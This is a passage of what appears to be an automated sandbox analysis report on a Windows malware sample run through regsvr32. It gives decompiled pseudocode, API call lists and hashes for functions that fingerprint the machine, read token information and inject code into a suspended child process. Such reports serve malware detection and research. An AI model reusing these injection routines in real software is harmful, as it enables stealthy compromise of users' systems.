                                                                                                                                                                                              • Opcode ID: 76e81e4b8e2bd1b57bcd5c9b0b8f9c779a5c4e20c6e10e96e63e9ea6e009c7bf
                                                                                                                                                                                              • Instruction ID: 0477b5758ccad1e38f68d864b11bef4ec2d1aa7dc817fe527a3bf3d8f537acbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76e81e4b8e2bd1b57bcd5c9b0b8f9c779a5c4e20c6e10e96e63e9ea6e009c7bf
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7319271A001559BCF25CF6DC8846AEBBE9EF44344F28447AD845E7391E730FD518B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E0499C5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				short _v528;
                                                                                                                                                                                              				short _v1040;
                                                                                                                                                                                              				short _v1552;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              				WCHAR* _t27;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                              				WCHAR* _t43;
                                                                                                                                                                                              				WCHAR* _t56;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t44 = __ecx;
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                              				_t56 = __ecx;
                                                                                                                                                                                              				E04998D6D(__edx, 0, 0x100);
                                                                                                                                                                                              				_v12 = 0x100;
                                                                                                                                                                                              				_t23 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                                              				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                                              				_t27 = E04999DF2(_t44, 0xad6);
                                                                                                                                                                                              				_v16 = _t27;
                                                                                                                                                                                              				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                              				E04998BAF( &_v16);
                                                                                                                                                                                              				_t33 = E0499A456(_t43);
                                                                                                                                                                                              				E04999E51( &(_t43[E0499A456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                              				lstrcatW(_t43, _t56);
                                                                                                                                                                                              				_t38 = E0499A456(_t43);
                                                                                                                                                                                              				_v12 = _t38;
                                                                                                                                                                                              				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                              				return E0499E2C5(_t43, E0499A456(_t43) + _t40, 0);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 0499C633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0499C665
                                                                                                                                                                                                • Part of subcall function 04999E51: _vsnwprintf.MSVCRT ref: 04999E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 0499C69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0499C6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: cbaac0a55bd57eca5d29e50aa8eaad8b1911e6fc464c6ea4f0dc6d9acdf7e29e
                                                                                                                                                                                              • Instruction ID: edaa63d1a57127ceac871258f20f5e67f0aa0cd4ac2496ae63e123c86b6d0b54
                                                                                                                                                                                              • Opcode Fuzzy Hash: cbaac0a55bd57eca5d29e50aa8eaad8b1911e6fc464c6ea4f0dc6d9acdf7e29e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 022149B2D00214BFEB14ABA8DC49FEE77FCEF85214F144575F505D6180EA74AE448BA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 212 499c7f5-499c815 GetTokenInformation 213 499c85b 212->213 214 499c817-499c820 GetLastError 212->214 215 499c85d-499c861 213->215 214->213 216 499c822-499c832 call 4998bde 214->216 219 499c838-499c84b GetTokenInformation 216->219 220 499c834-499c836 216->220 219->213 221 499c84d-499c859 call 4998bf4 219->221 220->215 221->220
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E0499C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                              				_t28 = __edx;
                                                                                                                                                                                              				_t20 = _t22;
                                                                                                                                                                                              				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					_t12 = _t31;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t31 = E04998BDE(_v8);
                                                                                                                                                                                              					_v12 = _t31;
                                                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                                                              						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							E04998BF4( &_v12, _t16);
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04990000,00000000,00000000,?,0499C876,00000000,00000000,?,0499C89F), ref: 0499C810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C817
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: c765af53ddf6c1454c118cd7a9755e29db778580e887eaf79361c1462fc192ec
                                                                                                                                                                                              • Instruction ID: 458921224b0aec2486a6d12120090741799266f3eb864d62bb6a37019a1e7378
                                                                                                                                                                                              • Opcode Fuzzy Hash: c765af53ddf6c1454c118cd7a9755e29db778580e887eaf79361c1462fc192ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC0144B2B00114BFAF20AAAEDC48DAB7FFCEF456A07110579F505E6110E670FD0096E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 224 499bc84-499bcd3 call 4998d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E0499BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                              				struct _STARTUPINFOW _v72;
                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                              
                                                                                                                                                                                              				E04998D6D(__edx, 0, 0x10);
                                                                                                                                                                                              				E04998D6D( &_v72, 0, 0x44);
                                                                                                                                                                                              				_v72.cb = 0x44;
                                                                                                                                                                                              				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~( ~_t11) - 1;
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0499BCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: 642ef2f7ee60f388ae4639bacdbbd0a830d641105817a14afc9ff1576b7ad41c
                                                                                                                                                                                              • Instruction ID: cc7dd8c2ad6aa4a3b98594c4de32f779e9e5cdbfe0fb6faf1c220c8185f62317
                                                                                                                                                                                              • Opcode Fuzzy Hash: 642ef2f7ee60f388ae4639bacdbbd0a830d641105817a14afc9ff1576b7ad41c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BF065F16402087EFB20E669DC0AFBF7AECDB81714F500135BB05EB1C0E6A4AD0582B5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 229 499d804-499d824 call 499d6dc 232 499d82a-499d849 call 499b557 229->232 233 499d955-499d958 229->233 236 499d84f-499d851 232->236 237 499d945-499d954 call 4998bf4 232->237 239 499d933-499d943 call 4998bf4 236->239 240 499d857-499d859 236->240 237->233 239->237 242 499d85c-499d85e 240->242 245 499d921-499d92d 242->245 246 499d864-499d883 call 4998d6d call 499bc84 242->246 245->236 245->239 251 499d8e5-499d8e9 246->251 252 499d885-499d898 call 499d959 246->252 253 499d8eb-499d8ed 251->253 254 499d914-499d91b 251->254 252->251 259 499d89a-499d8b2 252->259 256 499d8ef-499d8f5 253->256 257 499d8fe-499d90e 253->257 254->242 254->245 256->257 257->254 262 499d8e2 259->262 263 499d8b4-499d8c9 GetLastError call 499da57 259->263 262->251 266 499d8cb-499d8d6 263->266 267 499d8de-499d8df FindCloseChangeNotification 263->267 269 499d8d9 266->269 270 499d8d8 266->270 267->262 269->267 270->269
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E0499D804(intOrPtr __edx) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                              				char _t87;
                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              				_v20 = __edx;
                                                                                                                                                                                              				_t86 = 0;
                                                                                                                                                                                              				_t37 = E0499D6DC( &_v16);
                                                                                                                                                                                              				_t87 = _t37;
                                                                                                                                                                                              				_v24 = _t87;
                                                                                                                                                                                              				_t89 = _t87;
                                                                                                                                                                                              				if(_t87 == 0) {
                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t38 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              				_t7 = _t38 + 0xac; // 0x1d290ddf
                                                                                                                                                                                              				E0499B557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                                              				_v12 = _v12 & 0;
                                                                                                                                                                                              				_t67 = _v16;
                                                                                                                                                                                              				if(_t67 == 0) {
                                                                                                                                                                                              					L21:
                                                                                                                                                                                              					E04998BF4( &_v24, 0);
                                                                                                                                                                                              					return _t86;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_t86 == 0) {
                                                                                                                                                                                              					_t69 = 0;
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					while(_t86 == 0) {
                                                                                                                                                                                              						E04998D6D( &_v40, _t86, 0x10);
                                                                                                                                                                                              						_t88 = _t88 + 0xc;
                                                                                                                                                                                              						_t49 = E0499BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                                              						_t94 = _t49;
                                                                                                                                                                                              						if(_t49 >= 0) {
                                                                                                                                                                                              							_t56 = E0499D959(E049961C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                                              							if(_t56 != 0) {
                                                                                                                                                                                              								_t59 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                                              								if(_t70 != 0) {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t62 = E0499DA57( &_v40);
                                                                                                                                                                                              									_t63 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              									if(_t62 != 0) {
                                                                                                                                                                                              										_push(0xea60);
                                                                                                                                                                                              										_push(_t70);
                                                                                                                                                                                              										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                                              											_t86 = _t86 + 1;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t63 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              									}
                                                                                                                                                                                              									FindCloseChangeNotification(_t70);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t69 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v40 != 0) {
                                                                                                                                                                                              							if(_t86 == 0) {
                                                                                                                                                                                              								_t54 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t50 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                                              							_t52 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t69 = _t69 + 1;
                                                                                                                                                                                              						_v8 = _t69;
                                                                                                                                                                                              						if(_t69 < 2) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t67 = _v16;
                                                                                                                                                                                              					_t45 = _v12 + 1;
                                                                                                                                                                                              					_v12 = _t45;
                                                                                                                                                                                              					if(_t45 < _t67) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                              					} while (_t67 != 0);
                                                                                                                                                                                              					goto L21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L20:
                                                                                                                                                                                              				E04998BF4(_t87, 0xfffffffe);
                                                                                                                                                                                              				_t87 = _t87 + 4;
                                                                                                                                                                                              				_t67 = _t67 - 1;
                                                                                                                                                                                              			}





























                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                                • Part of subcall function 0499BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0499BCC6
                                                                                                                                                                                                • Part of subcall function 0499D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0499D9BB
                                                                                                                                                                                                • Part of subcall function 0499D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0499DA04
                                                                                                                                                                                                • Part of subcall function 0499D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0499DA21
                                                                                                                                                                                                • Part of subcall function 0499D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0499DA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0499D8B4
                                                                                                                                                                                                • Part of subcall function 0499DA57: ResumeThread.KERNELBASE(?,0499D8C2,?,?,00000001), ref: 0499DA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0499D8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 678b2a7d636721d29be5dadb2f9b58dfa251569098174b71b3b3d6d27edabf6a
                                                                                                                                                                                              • Instruction ID: ea5ff85795a01fa9ff47c5c8424a35b8df25553dd38ec4e460e316d1d130ebf4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 678b2a7d636721d29be5dadb2f9b58dfa251569098174b71b3b3d6d27edabf6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB415C71A00209AFDF10EF9DD9C4AAEB7F9EF88314F104279E905A7251DB30AD418B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				WCHAR* _t23;
                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              				intOrPtr* _t49;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				if(_a8 != 1) {
                                                                                                                                                                                              					__eflags = _a8;
                                                                                                                                                                                              					if(_a8 != 0) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                              						return 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t15 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04998BC9();
                                                                                                                                                                                              				E04999591();
                                                                                                                                                                                              				 *0x49af830 = _a4;
                                                                                                                                                                                              				E049A3CD5(_a4);
                                                                                                                                                                                              				 *_t49 = 0xf43;
                                                                                                                                                                                              				 *0x49af818 = E0499F05C(0x49aca50, 0x138);
                                                                                                                                                                                              				 *_t49 = 0x111;
                                                                                                                                                                                              				_t23 = E04999DF2(0x49aca50);
                                                                                                                                                                                              				_pop(_t41);
                                                                                                                                                                                              				_a8 = _t23;
                                                                                                                                                                                              				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                                              				_push( &_a8);
                                                                                                                                                                                              				if(_t24 == 0xffffffff) {
                                                                                                                                                                                              					E04998BAF();
                                                                                                                                                                                              					 *_t49 = 0x40e;
                                                                                                                                                                                              					_t28 = E04999CB5(E0499109A(_t41));
                                                                                                                                                                                              					_a8 = _t28;
                                                                                                                                                                                              					__eflags = _t28;
                                                                                                                                                                                              					if(_t28 != 0) {
                                                                                                                                                                                              						_t48 = 0x54;
                                                                                                                                                                                              						 *0x49af828 = E0499F05C(0x49acbb8, _t48);
                                                                                                                                                                                              						E04996370(_t48, __eflags);
                                                                                                                                                                                              						E04998BF4( &_a8, 0xfffffffe);
                                                                                                                                                                                              						_t36 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					_t31 = CreateThread(0, 0, E04996298, 0, 0,  &_v8);
                                                                                                                                                                                              					 *0x49af83c = _t31;
                                                                                                                                                                                              					__eflags = _t31;
                                                                                                                                                                                              					if(_t31 == 0) {
                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04998BAF();
                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,04996502), ref: 04998BD2
                                                                                                                                                                                                • Part of subcall function 0499F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 04996541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04996298,00000000,00000000,?), ref: 049965C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: 132ca43a1502db9f7ab1ea66d722136b781f7418942772f129368c3d28c7ad1d
                                                                                                                                                                                              • Instruction ID: 0466ac5271b5dcc43261b4f80318f180c2348766ade0033e3177142a9256f013
                                                                                                                                                                                              • Opcode Fuzzy Hash: 132ca43a1502db9f7ab1ea66d722136b781f7418942772f129368c3d28c7ad1d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A2171B1A14204AFEF44BF7CD805A593BE8EF45314F008539E51ACA284DB78FD40CBA6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 307 499f05c-499f07c call 4999dd8 310 499f07e-499f084 GetModuleHandleA 307->310 311 499f086-499f08b LoadLibraryA 307->311 312 499f08d-499f08f 310->312 311->312 313 499f09e-499f0ac call 4998b9c 312->313 314 499f091-499f096 call 499f011 312->314 317 499f09b-499f09c 314->317 317->313
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E0499F05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                              				struct HINSTANCE__* _t7;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                              				_t22 = __edx;
                                                                                                                                                                                              				_t5 = E04999DD8(_a4);
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v8 = _t5;
                                                                                                                                                                                              				_push(_t5);
                                                                                                                                                                                              				if(_a4 != 0xf43) {
                                                                                                                                                                                              					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t7 = GetModuleHandleA();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                              					_t10 = E0499F011(_t12, _t22, _t7); // executed
                                                                                                                                                                                              					_t25 = _t10;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04998B9C( &_v8);
                                                                                                                                                                                              				return _t25;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: 68a0700e9e18b46d0d148149d2f4d9e9a5784cc6d573bb9547bfa9d9a7d769be
                                                                                                                                                                                              • Instruction ID: 76834f4003dd4e80c1eb65b612b80024fb1bb6dc49f111030f140cd97655d84b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a0700e9e18b46d0d148149d2f4d9e9a5784cc6d573bb9547bfa9d9a7d769be
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0AE717041147BEB14AB6DE84446AF7EDDF843557144439F606D3154EA70AE4086D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 319 499c8c9-499c8e8 call 499c79e 322 499c8ee-499c905 call 499c7f5 319->322 323 499c983-499c986 319->323 326 499c965-499c973 FindCloseChangeNotification 322->326 327 499c907-499c928 322->327 328 499c981 326->328 329 499c975-499c980 call 4998bf4 326->329 327->326 333 499c92a-499c92c 327->333 328->323 329->328 334 499c958-499c963 333->334 335 499c92e-499c931 333->335 334->326 336 499c934-499c943 335->336 339 499c955-499c957 336->339 340 499c945-499c951 336->340 339->334 340->336 341 499c953 340->341 341->334
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E0499C8C9(void* __ecx, void* __esi) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
